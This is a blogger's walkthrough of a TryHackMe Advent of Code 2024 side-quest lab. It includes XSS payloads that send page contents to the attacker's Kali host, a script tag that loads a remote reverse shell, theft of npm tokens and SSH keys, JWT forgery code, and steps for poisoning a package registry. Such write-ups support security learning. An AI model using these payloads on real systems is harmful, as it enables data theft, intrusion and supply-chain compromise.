Tryhackme AoC 2024 Side Quest: T5: An Avalanche of Web Apps (Part 1)
Within Day 19, the last question for the game hacking section says:
We start a Python server on the VM so we can pull down the game file to our machine
Running strings we see this:
Loading up Binary Ninja, if we do a Control + f for keycard, we see an interesting function
I might have to pivot over to Ghidra, doesn’t look like it sees anything, but its obviously a function for something
We missed a few folders in our initial wget download
I think we are still missing something, within the .so folder are just JavaScript files
If we run a find command, we just the actual .so file
We can wget this
After importing this file into Ghidra and clicking on the create_keycard, off to the right we see an interesting nexted condition
I wasn’t sure how to build a script and use this password to move forward, so I needed help from a walk-through
Running the script produces a zip file
Now we will exit out of frida and set up our Python server so we can pull down the zip to our Kali machine
Using the password we found (where_is_the_yeti) we are able to unlock the zip
We have our keycard password
Keycard: five_five_five_five_five
***Unfortunately both Part 1 and 2 are a bit scattered, there’s a lot of things I tried that seemed to partially work, so please read through everything carefully since if you get stuck, I probably mention how to get you unstuck later on***
The standard port of 21337 unlocks the VM FW
Running a rustscan, we find 3 open ports
Browsing to the IP, we have to add the domain to our hosts file
Browsing to the domain, we have a bare page
We are either going to find sub-directories or sub-domains
Using the small wordlist doesn’t find anything unfortunately
We will use dig to look for DNS Zone Transfers
IPs to take note of: 172.16.2 and 3
Of the 5 sub-domains, only 3 redirect to a new page
Using xsser against the Contact US section, we are missing some needed data
I tested the above tool, but it couldn’t find an injection point, so I resorted to manual testing
I ended up changing the port it was listening on to 80 (which means the port isn’t needed in the above screen shot)
It seems problematic, so if the Python server doesn’t catch it initially, just keep trying
The request runs every minute, but our script isn’t triggering
async function exfil() {
const response = await fetch('/');
const text = await response.text();
await fetch(`http://<kali ip>/?data=${btoa(text)}`);
Kudos to the script and other assistance, given to the following write-up
Modifying the script slightly and changing the: ` to ‘ doesn’t seem to help either
Since something is obviously still wrong, I asked ChatGPT for help, to try and incorporate some logging to see if I could see what was going on and how far in the script it was making it, but unfortunately I am not getting any different results. The modified script is below
// Create a function to send log data to the external server
async function sendLog(data) {
await fetch(`http://<kali tun0 ip>/?log=${encodeURIComponent(data)}`);
async function exfil() {
// Send initial log to server to confirm the script is running
await sendLog('Script is running...');
const response = await fetch('/xss.js');
const text = await response.text();
// Send the raw text content (or an error if no content is fetched)
if (text) {
const encodedData = btoa(text);
await sendLog(`Encoded Data: ${encodedData}`); // Send Base64 data to the server
await fetch(`http://<kali tun0 ip>/?data=${encodedData}`);
} else {
await sendLog('No content fetched or empty response');
// Execute the exfil function
Today, it seems like it wants to play nice
The script I used:
async function exfil() {
const response = await fetch('/');
const text = await response.text();
await fetch(`http://<kali ip>/?data=${btoa(text)}`);
If we echo ‘<the base64 text’ | base64 -d, we get the following:
I keep copying and modifying the new version out of concern that because the previous version got called earlier, a modified version might break
The script:
async function exfil() {
const response = await fetch('/wiki');
const text = await response.text();
await fetch(`http://<kali ip>/?data=${btoa(text)}`);
The script:
async function exfil() {
const response = await fetch('/wiki/new');
const text = await response.text();
await fetch(`http://<kali ip>/?data=${btoa(text)}`);
This one, we see a POST request to wiki
The next script is as follows (when copy/pasting, the indentations are tabs and not individual spaces):
async function exfil() {
const response = await fetch('/wiki', {
method: "POST"
const text = await response.text();
await fetch(`http://<kali ip>/?data=${btoa(text)}`);
We need to hop over to the npm-registry
we notice the author is mcskidy, let’s download it
It downloads as a .tgz file
Per ChatGPT
This code converts markdown content into HTML and can dynamically execute
JavaScript code within the markdown using a sandbox environment. Let’s
break it down:
1. Markdown to HTML Conversion:
The function markdownToHtml takes in markdown text and transforms it into
HTML elements. It uses regular expressions (replace()) to match common
markdown syntax and replace it with corresponding HTML tags:
# -> <h1> (for main headings)
## -> <h2> (for subheadings)
### -> <h3> (for further subheadings)
* -> <li> (for bullet points)
** -> <b> (for bold)
* -> <i> (for italic)
2. Dynamic Code Execution:
The function also looks for parts of the markdown surrounded by {{ ... }}
(i.e., dynamic code). It treats this as JavaScript code and executes it:
The regular expression \{\{(.*?)\}\} captures the content inside the double
curly braces.
If dynamic code is found, it runs it in a secure, isolated environment
using Node.js's vm.runInNewContext().
A "sandbox" context is created, which includes any provided context
(variables or functions) and the require function.
The code is executed in the sandbox to avoid interacting with the global
environment, providing some level of isolation.
3. Error Handling:
If an error occurs when executing the dynamic code, the function catches
the error and returns a red-colored error message in the HTML output.
4. Use Case:
This function could be used in a web application or documentation platform
that allows users to write in markdown, but also want to include dynamic,
executable content (like JavaScript) embedded in their markdown.
Potential Risks:
Since this code executes JavaScript from markdown (which could be
user-generated), it has significant security implications:
Code injection vulnerability: Malicious users could inject harmful
JavaScript, leading to server compromise, privilege escalation, or
unauthorized actions.
Sandboxing concerns: Even though the code uses vm.runInNewContext()
to isolate the environment, there could still be potential risks,
depending on the context and the objects available in the sandbox.
Finally time for 1 of many reverse shells (the code is in the walk-through above and at the bottom of this article as well) — Medium breaks (does like the shell, hence why it’s not copy/pasted here)
The indentations are tabs
Same as before, within the Contact Us page, use the following XSS
<script src="http://<kali ip>/reverse.js"></script>
This will call the script from the Python server, and shell.js will call index.html (both have to be in the same folder as the Python server) to get the reverse shell
What is the value of flag 1?
Answer: THM{09a3f8918a32ea38a2c833c98214336a}
When stabilizing the shell, there might be extra characters printed after you get the initial shell via netcat, just delete everything to the #
Let’s see what this script is
We are root, but probably stuck in a container considering all of the different IPs from our dig command
We can’t SSH in (even with adding our pub key to authorized_keys)
Catting the .npmrc file, we have an auth token
Within /app we ee the following
Navigating through, we find a .git repo
Let’s cat those 3 other files
Since the .git folder is hidden, we will tar the entire assets directory so we can then transfer it to our local machine
Now we are going to move the tar file into the assets folder
Then on a different terminal, all we have to do is run wget to grab our file
Now, with it on our host Kali machine, we will untar it
Now we are able to successfully inspect the .git folder
Let’s run git log to check out what commits happened
based on the middle commit message about issues with the backup directory, we will checkout the commit prior to that
We find an SSH key
In order to SSH in, we need to add the root domain: bestfestivalcompany.thm to our hosts file. Also chmod 600 the backup.key file
In the walk-through, it basically says that you can create a variable and put the ssh command in quotes followed by git clone, that didn’t work for me
But, here’s what did, in order to clone the admdev and admint repos to our local machine
- Create a config file (if it doesn’t exist, also do not add a file extension) in your /home/<user>/.ssh/
- Add the following lines (the indentations are a single tab)
Host gitserv
Hostname bestfestivalcompany.thm
Identityfile <full path to>/assets/assets/backups/backup.key
IdentitiesOnly yes
AddKeysToAgent yes
Then all we have to do is as follows:
git clone git@gitserv:admdev.git
git clone git@gitserv:admint.git
Code within admint
const express = require('express');
const bodyParser = require('body-parser');
const jwt = require('jsonwebtoken');
const axios = require('axios');
const RemoteManager = require('bfcadmin-remote-manager');
const fs = require('fs');
const { JWK } = require('node-jose');
const app = express();
const PORT = 3000;
app.use(bodyParser.urlencoded({ extended: true }));
let JWKS = null;
// Fetch JWKS
async function fetchJWKS() {
try {
console.log('Fetching JWKS...');
const response = await axios.get('http://thehub-uat.bestfestivalcompany.thm:3000/jwks.json');
const fetchedJWKS =;
if (validateJWKS(fetchedJWKS)) {
JWKS = fetchedJWKS;
console.log('JWKS validated and updated successfully.');
} else {
console.error('Invalid JWKS structure. Retaining the previous JWKS.');
} catch (error) {
console.error('Failed to fetch JWKS:', error.message);
// Validate JWKS
function validateJWKS(jwks) {
if (!jwks || !Array.isArray(jwks.keys) || jwks.keys.length === 0) {
return false;
for (const key of jwks.keys) {
if (!key.kid || (!key.x5c && (!key.n || !key.e))) {
return false;
return true;
// Periodically fetch JWKS every 1 minute
setInterval(fetchJWKS, 60 * 1000);
// Middleware to ensure JWKS is loaded
function ensureJWKSLoaded(req, res, next) {
if (!JWKS || !JWKS.keys || JWKS.keys.length === 0) {
return res.status(503).json({ error: 'JWKS not available. Please try again later.' });
// Middleware to authenticate JWT
async function authenticateToken(req, res, next) {
const token = req.headers.authorization?.split(' ')[1];
if (!token) return res.status(401).json({ error: 'Unauthorized' });
try {
const key = JWKS.keys[0];
let publicKey;
if (key?.x5c) {
publicKey = `-----BEGIN CERTIFICATE-----\n${key.x5c[0]}\n-----END CERTIFICATE-----`;
} else if (key?.n && key?.e) {
const rsaKey = await JWK.asKey({
kty: key.kty,
n: key.n,
e: key.e,
publicKey = rsaKey.toPEM();
} else {
return res.status(500).json({ error: 'Public key not found in JWKS.' });
jwt.verify(token, publicKey, { algorithms: ['RS256'] }, (err, user) => {
if (err || user.username !== 'mcskidy-adm') {
return res.status(403).json({ error: 'Forbidden' });
req.user = user;
} catch (error) {
res.status(500).json({ error: 'Failed to authenticate token.', details: error.message });
// SSH configuration
const sshConfig = {
host: '', // Supplied by the user in API requests
port: 22,
username: 'root',
privateKey: fs.readFileSync('./root.key'),
readyTimeout: 5000,
strictVendor: false,
tryKeyboard: true,
// Restart service'/restart-service', ensureJWKSLoaded, authenticateToken, async (req, res) => {
const { host, service } = req.body;
if (!host || !service) {
return res.status(400).json({ error: 'Missing host or serviceName value.' });
try {
const manager = new RemoteManager({ ...sshConfig, host });
const output = await manager.restartService(service);
res.json({ message: `Service ${service} restarted successfully`, output });
} catch (error) {
res.status(500).json({ error: 'Failed to restart service', details: error.message });
// Modify resolv.conf'/modify-resolv', ensureJWKSLoaded, authenticateToken, async (req, res) => {
const { host, nameserver } = req.body;
if (!host || !nameserver) {
return res.status(400).json({ error: 'Missing host or nameserver value.' });
try {
const manager = new RemoteManager({ ...sshConfig, host });
const output = await manager.modifyResolvConf(nameserver);
res.json({ message: 'resolv.conf updated successfully', output });
} catch (error) {
res.status(500).json({ error: 'Failed to modify resolv.conf', details: error.message });
// Reinstall Node.js modules'/reinstall-node-modules', ensureJWKSLoaded, authenticateToken, async (req, res) => {
const { host, service } = req.body;
if (!host || !service) {
return res.status(400).json({ error: 'Missing host or service value.' });
try {
const manager = new RemoteManager({ ...sshConfig, host });
const output = await manager.reinstallNodeModules(service);
res.json({ message: `Node modules reinstalled successfully for service ${service}`, output });
} catch (error) {
res.status(500).json({ error: 'Failed to reinstall node modules', details: error.message });
// Start server
app.listen(PORT, () => {
console.log(`Server running on http://localhost:${PORT}`);
Near the top, we see:
Catting that json file from our active remote shell
{"keys": [{
"kty": "RSA",
"e": "AQAB",
"use": "sig",
"kid": "FdIGp1xoPOzfAm/9qZgMPIBI7rk=",
"alg": "RS256",
"n": "hoGPOfw_tnBttFdk_RSrl_9glQGFwemyM17SPYwnQNAu_IAYkbvy8Z2UKEKY4Ve5oFwJA0InMhJKMLs434T_5BkJJeAUCI7IMcxY4z_8YPyrqxEnCohusbdrOJUh0o4bLZK7lL3zcbCQNY5tTbHoMpkPb_EOqU3h99H0f5L8JUQN0rnRP7YYTqDYBaRUmrOl8I3JbBkKR0ISIfURVoV71bTw5jufBtJi057qRjH1A9gpyQVbeaGv_bquJsRkzbvm-c31XKJGL14_pcCwSn6LAw_M7PSauJrIRjYXhRrB9fImwzv6EqPF5P_zmhSfLFJ4N6CDXkkTQWgiur_ZBDqy8w"
Catting the /etc/hosts file, we can see that our hostname matches the IP
Scrolling back up to the dig output, this is where the IPs come in handy
Uploading nmap and untarring it, we see port 3000 running on
We can likely set this up with Chisel and Proxychains, but we are going to use an easier tool (mentioned in the walk-through at the end)
Within the releases we need:
We’ll extract them using: tar -xzf <file name>
Now we need to run 4 commands on our Kali machine:
sudo ip tuntap add user <your username> mode tun ligolo
sudo ip link set ligolo up
sudo ip route add dev ligolo
sudo ip route add dev ligolo
Now we start the proxy via: ./proxy -selfcert
Next upload the agent to the /app folder on the remote system
Next chmod +x agent
Then run: ./agent -connect <Kali IP>:<ligolo port from ./proxy> --ignore-cert
Once this command is ran, hopping over to the other terminal where proxy is being ran, the agent has connected
Within the proxy ligolo terminal, type in session, press Enter, then type in start and press Enter
Now we launch Burp, Turn on FoxyProxy, Start the Intercept, and browse to the following URL
Within Burp, we see the following:
We’ll send this to Repeater
We are going to create a POST request to see if we can restart the service
The updated POST request
Once we send off the request, we’ll get an error of unauthorized, which makes sense since we are not authenticating as: mcskidy-adm (You need to keep lines 11 and 12 blank, ie don’t delete them, else the request won’t work)
We’ll install the following Burp Extension from the BApp Store
We’ll create a new RSA key
We will enter the ID from the jwks.json file, and click Generate
After clicking Generate, we have the following output:
Saving this data to a text file just in case, would be useful before clicking OK
Now we need another BApp Store Extension
We need to stop our proxy via Control + c so we can edit the jwks.json file within: /app/bfc_thehubuat/assets
Since we don’t have nano, we can delete the file and upload a new version. So we will copy the data into a new file on Kali named jwks.json
We’ll replace the e and n values from the RSA key we generated earlier
Now we can remove the jwks.json file from /assets, upload our version via wget, and restart up the proxy and agent applications
Something is wrong, so we will use the script to generate a jwks.json file. When running it, we received the following error:
I had ChatGPT fix it, the explanation of why the original code was broken:
The error you’re encountering is due to trying to hash the RSAPublicKey
object directly, which is not hashable. The hash()
function cannot be applied to complex objects like cryptographic key objects.
To resolve this, you should convert the public key to a format that is hashable (e.g., by converting it to a string or bytes before hashing). A common approach is to serialize the public key to a PEM format or extract its modulus (n
) and exponent (e
) and hash those.
Here’s how you can fix the issue:
Modify the generate_jwks
Instead of using hash(public_key)
, serialize the public key to PEM format or use its components (n
and e
) directly for generating the kid
# Export the public key in JWKS format
def generate_jwks(public_key):
public_numbers = public_key.public_numbers()
e = base64.urlsafe_b64encode(public_numbers.e.to_bytes(3, byteorder='big')).decode('utf-8').rstrip("=")
n = base64.urlsafe_b64encode(public_numbers.n.to_bytes((public_numbers.n.bit_length() + 7) // 8, byteorder='big')).decode('utf-8').rstrip("=")
# Create kid based on a unique and deterministic identifier
public_key_pem = public_key.public_bytes(
kid = base64.urlsafe_b64encode(public_key_pem).decode('utf-8').rstrip("=")
jwk = {
"keys": [
"kty": "RSA",
"e": e,
"use": "sig",
"kid": f"sig-{kid}",
"alg": "RS256",
"n": n
return jwk
serializes the public key into PEM format.- Then, we encode the PEM data as a URL-safe base64 string to generate a
This way, the kid
becomes a unique identifier derived from the public key, and the error will be resolved.
The following is the fully updated code:
import jwt
import json
import base64
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
# Generate RSA key pair
def generate_rsa_key():
private_key = rsa.generate_private_key(
public_key = private_key.public_key()
return private_key, public_key
# Export the public key in JWKS format
def generate_jwks(public_key):
public_numbers = public_key.public_numbers()
e = base64.urlsafe_b64encode(public_numbers.e.to_bytes(3, byteorder='big')).decode('utf-8').rstrip("=")
n = base64.urlsafe_b64encode(public_numbers.n.to_bytes((public_numbers.n.bit_length() + 7) // 8, byteorder='big')).decode('utf-8').rstrip("=")
# Create kid based on a unique and deterministic identifier
public_key_pem = public_key.public_bytes(
kid = base64.urlsafe_b64encode(public_key_pem).decode('utf-8').rstrip("=")
jwk = {
"keys": [
"kty": "RSA",
"e": e,
"use": "sig",
"kid": f"sig-{kid}",
"alg": "RS256",
"n": n
return jwk
# Generate a JWT
def generate_jwt(private_key, payload, kid):
headers = {
"alg": "RS256",
"typ": "JWT",
"kid": kid
token = jwt.encode(payload, private_key, algorithm="RS256", headers=headers)
return token
# Main logic
if __name__ == "__main__":
private_key, public_key = generate_rsa_key()
# Serialize private key for signing
private_key_pem = private_key.private_bytes(
# Generate JWKS
jwks = generate_jwks(public_key)
print(json.dumps(jwks, indent=4))
# Generate JWT
payload = {
"username": "mcskidy-adm"
kid = jwks["keys"][0]["kid"]
jwt_token = generate_jwt(private_key_pem, payload, kid)
print("\nAuthorization Header:")
print(f"Bearer {jwt_token}")
Exit the proxy, modify the jwks.json file on Kali, delete the current jwks.json file within /app/bfc-thehub-uat/assets on the remote server, re-upload the new jwks.json, restart the proxy and agent
Resend a new GET request to:
Modify it to a POST request like earlier, but add the authorization: section with the Bearer token from the Python script output
This message shows that authentication was successful
Now we will install a DNS server using: sudo apt install dnsmasq
Now we will edit /etc/dnsmasq.conf and add the following:
auth-server=bestfestivalcompany.thm # this option is required depending on dnsmasq version
# Disable any DHCP functionality (DNS only)
host-record=npm-registry.bestfestivalcompany.thm,<Kali IP>
# Enable logging for debugging purposes
We can add this to the top of the file
When trying to restart the dnsmasq service after making the necessary modifications, getting some errors
Running: ss -lp “sport = :domain” we can see that it is systemd-resolve
We’ll stop it with: sudo systemctl stop systemd-resolved, then we can restart dnsmasq
We can verify all is set up correctly by running the following command and verifying that the first IP is the Kali IP
If we upload nmap and rerun a new scan, we see a few other ports
Going back to the admdev repo that we cloned earlier, we have a hidden file
Catting index.js, we see express
Cross-checking npm-registry for express, and looking at the Dependencies tab, we have multiple packages that don’t specify an exact version
We’ll download this package
Let’s extract the tar with: tar -xzf content-type-1.0.5.tgz
Within the package folder, this is the current version of index.js
Our modified index.js file that will curl our Kali IP
Now we need to modify package.json. The current contents:
Modified version:
Back in our shell, under /root is a .npmrc file
Catting this file, we have an auth token we need
Now we will run npm config set with the auth token
Next we publish the registry
Next set up a netcat listener on the port set within index.js
We first need to update the nameserveto our Kali IP
Now we verify we can reinstall the node modules
Since the errors aren’t normal (something is wrong) I took out the 2 lines within index.js and created a new file called exploit.js and inserted both lines. Then I made a modification at the bottom of the package.json file. Also will need to increase the version of the file at the top as well.
Same error, something is still wrong
"output":"npm error code ECONNREFUSED
npm error errno ECONNREFUSED
npm error FetchError: request to http://npm-registry.bestfestivalcompany.thm:4873/express failed, reason:
npm error at ClientRequest.<anonymous> (/usr/local/lib/node_modules/npm/node_modules/minipass-fetch/lib/index.js:130:14)
npm error at ClientRequest.emit (node:events:519:28)
npm error at _destroy (node:_http_client:880:13)
npm error at onSocketNT (node:_http_client:900:5)
npm error at process.processTicksAndRejections (node:internal/process/task_queues:83:21) {
npm error code: 'ECONNREFUSED',
npm error errno: 'ECONNREFUSED',
npm error type: 'system',
npm error requiredBy: '.'
npm error }
npm error
npm error If you are behind a proxy, please make sure that the
npm error 'proxy' config is set properly. See: 'npm help config'
npm error A complete log of this run can be found in: /root/.npm/_logs/2025-02-18T05_32_01_191Z-debug-0.log"
3280d14a60c5:/app# cat /usr/lib/node_modules/npm/node_modules/minipass-fetch/lib/index.js
'use strict'
const { URL } = require('url')
const http = require('http')
const https = require('https')
const zlib = require('minizlib')
const { Minipass } = require('minipass')
const Body = require('./body.js')
const { writeToStream, getTotalBytes } = Body
const Response = require('./response.js')
const Headers = require('./headers.js')
const { createHeadersLenient } = Headers
const Request = require('./request.js')
const { getNodeRequestOptions } = Request
const FetchError = require('./fetch-error.js')
const AbortError = require('./abort-error.js')
// XXX this should really be split up and unit-ized for easier testing
// and better DRY implementation of data/http request aborting
const fetch = async (url, opts) => {
if (/^data:/.test(url)) {
const request = new Request(url, opts)
// delay 1 promise tick so that the consumer can abort right away
return Promise.resolve().then(() => new Promise((resolve, reject) => {
let type, data
try {
const { pathname, search } = new URL(url)
const split = pathname.split(',')
if (split.length < 2) {
throw new Error('invalid data: URI')
const mime = split.shift()
const base64 = /;base64$/.test(mime)
type = base64 ? mime.slice(0, -1 * ';base64'.length) : mime
const rawData = decodeURIComponent(split.join(',') + search)
data = base64 ? Buffer.from(rawData, 'base64') : Buffer.from(rawData)
} catch (er) {
return reject(new FetchError(`[${request.method}] ${
request.url} invalid URL, ${er.message}`, 'system', er))
const { signal } = request
if (signal && signal.aborted) {
return reject(new AbortError('The user aborted a request.'))
const headers = { 'Content-Length': data.length }
if (type) {
headers['Content-Type'] = type
return resolve(new Response(data, { headers }))
return new Promise((resolve, reject) => {
// build request object
const request = new Request(url, opts)
let options
try {
options = getNodeRequestOptions(request)
} catch (er) {
return reject(er)
const send = (options.protocol === 'https:' ? https : http).request
const { signal } = request
let response = null
const abort = () => {
const error = new AbortError('The user aborted a request.')
if (Minipass.isStream(request.body) &&
typeof request.body.destroy === 'function') {
if (response && response.body) {
response.body.emit('error', error)
if (signal && signal.aborted) {
return abort()
const abortAndFinalize = () => {
const finalize = () => {
if (signal) {
signal.removeEventListener('abort', abortAndFinalize)
// send request
const req = send(options)
if (signal) {
signal.addEventListener('abort', abortAndFinalize)
let reqTimeout = null
if (request.timeout) {
req.once('socket', socket => {
reqTimeout = setTimeout(() => {
reject(new FetchError(`network timeout at: ${
request.url}`, 'request-timeout'))
}, request.timeout)
req.on('error', er => {
// if a 'response' event is emitted before the 'error' event, then by the
// time this handler is run it's too late to reject the Promise for the
// response. instead, we forward the error event to the response stream
// so that the error will surface to the user when they try to consume
// the body. this is done as a side effect of aborting the request except
// for in windows, where we must forward the event manually, otherwise
// there is no longer a ref'd socket attached to the request and the
// stream never ends so the event loop runs out of work and the process
// exits without warning.
// coverage skipped here due to the difficulty in testing
// istanbul ignore next
if (req.res) {
req.res.emit('error', er)
reject(new FetchError(`request to ${request.url} failed, reason: ${
er.message}`, 'system', er))
req.on('response', res => {
const headers = createHeadersLenient(res.headers)
// HTTP fetch step 5
if (fetch.isRedirect(res.statusCode)) {
// HTTP fetch step 5.2
const location = headers.get('Location')
// HTTP fetch step 5.3
let locationURL = null
try {
locationURL = location === null ? null : new URL(location, request.url).toString()
} catch {
// error here can only be invalid URL in Location: header
// do not throw when options.redirect == manual
// let the user extract the errorneous redirect URL
if (request.redirect !== 'manual') {
/* eslint-disable-next-line max-len */
reject(new FetchError(`uri requested responds with an invalid redirect URL: ${location}`, 'invalid-redirect'))
// HTTP fetch step 5.5
if (request.redirect === 'error') {
reject(new FetchError('uri requested responds with a redirect, ' +
`redirect mode is set to error: ${request.url}`, 'no-redirect'))
} else if (request.redirect === 'manual') {
// node-fetch-specific step: make manual redirect a bit easier to
// use by setting the Location header value to the resolved URL.
if (locationURL !== null) {
// handle corrupted header
try {
headers.set('Location', locationURL)
} catch (err) {
/* istanbul ignore next: nodejs server prevent invalid
response headers, we can't test this through normal
request */
} else if (request.redirect === 'follow' && locationURL !== null) {
// HTTP-redirect fetch step 5
if (request.counter >= request.follow) {
reject(new FetchError(`maximum redirect reached at: ${
request.url}`, 'max-redirect'))
// HTTP-redirect fetch step 9
if (res.statusCode !== 303 &&
request.body &&
getTotalBytes(request) === null) {
reject(new FetchError(
'Cannot follow redirect with body being a readable stream',
// Update host due to redirection
request.headers.set('host', (new URL(locationURL)).host)
// HTTP-redirect fetch step 6 (counter increment)
// Create a new Request object.
const requestOpts = {
headers: new Headers(request.headers),
follow: request.follow,
counter: request.counter + 1,
agent: request.agent,
compress: request.compress,
method: request.method,
body: request.body,
signal: request.signal,
timeout: request.timeout,
// if the redirect is to a new hostname, strip the authorization and cookie headers
const parsedOriginal = new URL(request.url)
const parsedRedirect = new URL(locationURL)
if (parsedOriginal.hostname !== parsedRedirect.hostname) {
// HTTP-redirect fetch step 11
if (res.statusCode === 303 || (
(res.statusCode === 301 || res.statusCode === 302) &&
request.method === 'POST'
)) {
requestOpts.method = 'GET'
requestOpts.body = undefined
// HTTP-redirect fetch step 15
resolve(fetch(new Request(locationURL, requestOpts)))
} // end if(isRedirect)
// prepare response
res.once('end', () =>
signal && signal.removeEventListener('abort', abortAndFinalize))
const body = new Minipass()
// if an error occurs, either on the response stream itself, on one of the
// decoder streams, or a response length timeout from the Body class, we
// forward the error through to our internal body stream. If we see an
// error event on that, we call finalize to abort the request and ensure
// we don't leave a socket believing a request is in flight.
// this is difficult to test, so lacks specific coverage.
body.on('error', finalize)
// exceedingly rare that the stream would have an error,
// but just in case we proxy it to the stream in use.
res.on('error', /* istanbul ignore next */ er => body.emit('error', er))
res.on('data', (chunk) => body.write(chunk))
res.on('end', () => body.end())
const responseOptions = {
url: request.url,
status: res.statusCode,
statusText: res.statusMessage,
headers: headers,
size: request.size,
timeout: request.timeout,
counter: request.counter,
trailer: new Promise(resolveTrailer =>
res.on('end', () => resolveTrailer(createHeadersLenient(res.trailers)))),
// HTTP-network fetch step
const codings = headers.get('Content-Encoding')
// HTTP-network fetch step handle content codings
// in following scenarios we ignore compression support
// 1. compression support is disabled
// 2. HEAD request
// 3. no Content-Encoding header
// 4. no content response (204)
// 5. content not modified response (304)
if (!request.compress ||
request.method === 'HEAD' ||
codings === null ||
res.statusCode === 204 ||
res.statusCode === 304) {
response = new Response(body, responseOptions)
// Be less strict when decoding compressed responses, since sometimes
// servers send slightly invalid responses that are still accepted
// by common browsers.
// Always using Z_SYNC_FLUSH is what cURL does.
const zlibOptions = {
flush: zlib.constants.Z_SYNC_FLUSH,
finishFlush: zlib.constants.Z_SYNC_FLUSH,
// for gzip
if (codings === 'gzip' || codings === 'x-gzip') {
const unzip = new zlib.Gunzip(zlibOptions)
response = new Response(
// exceedingly rare that the stream would have an error,
// but just in case we proxy it to the stream in use.
body.on('error', /* istanbul ignore next */ er => unzip.emit('error', er)).pipe(unzip),
// for deflate
if (codings === 'deflate' || codings === 'x-deflate') {
// handle the infamous raw deflate response from old servers
// a hack for old IIS and Apache servers
const raw = res.pipe(new Minipass())
raw.once('data', chunk => {
// see
const decoder = (chunk[0] & 0x0F) === 0x08
? new zlib.Inflate()
: new zlib.InflateRaw()
// exceedingly rare that the stream would have an error,
// but just in case we proxy it to the stream in use.
body.on('error', /* istanbul ignore next */ er => decoder.emit('error', er)).pipe(decoder)
response = new Response(decoder, responseOptions)
// for br
if (codings === 'br') {
// ignoring coverage so tests don't have to fake support (or lack of) for brotli
// istanbul ignore next
try {
var decoder = new zlib.BrotliDecompress()
} catch (err) {
// exceedingly rare that the stream would have an error,
// but just in case we proxy it to the stream in use.
body.on('error', /* istanbul ignore next */ er => decoder.emit('error', er)).pipe(decoder)
response = new Response(decoder, responseOptions)
// otherwise, use response as-is
response = new Response(body, responseOptions)
writeToStream(req, request)
module.exports = fetch
fetch.isRedirect = code =>
code === 301 ||
code === 302 ||
code === 303 ||
code === 307 ||
code === 308
fetch.Headers = Headers
fetch.Request = Request
fetch.Response = Response
fetch.FetchError = FetchError
fetch.AbortError = AbortError
Sounds like network issues:
The error message you’re seeing is related to an issue with connecting to the npm registry while trying to install packages using npm
(Node Package Manager).
Here’s a breakdown of the error:
- ECONNREFUSED: This means that your computer tried to connect to a server (in this case, a custom npm registry URL) but the connection was refused. This could be due to the server not running or being unreachable, or a firewall blocking the connection.
- npm error FetchError: This indicates that there was an issue during the fetch request to the npm registry URL
. It failed to download theexpress
package from that registry. - The URL (
): It appears the npm registry is hosted at a custom URL (likely internal to your organization or project). The error suggests that this server might not be reachable at the moment.
We’ll install verdaccio and see if that helps with the issues
sudo npm install -g verdaccio
Now we need to listen on port 4873
verdaccio --listen
Please refer to the following URL for the continuation of this:
Shout-outs to the following write-ups for some major help, without awesome write-ups from others in the community, theres no way I would have been able to get through all 5 tasks of these Side Quests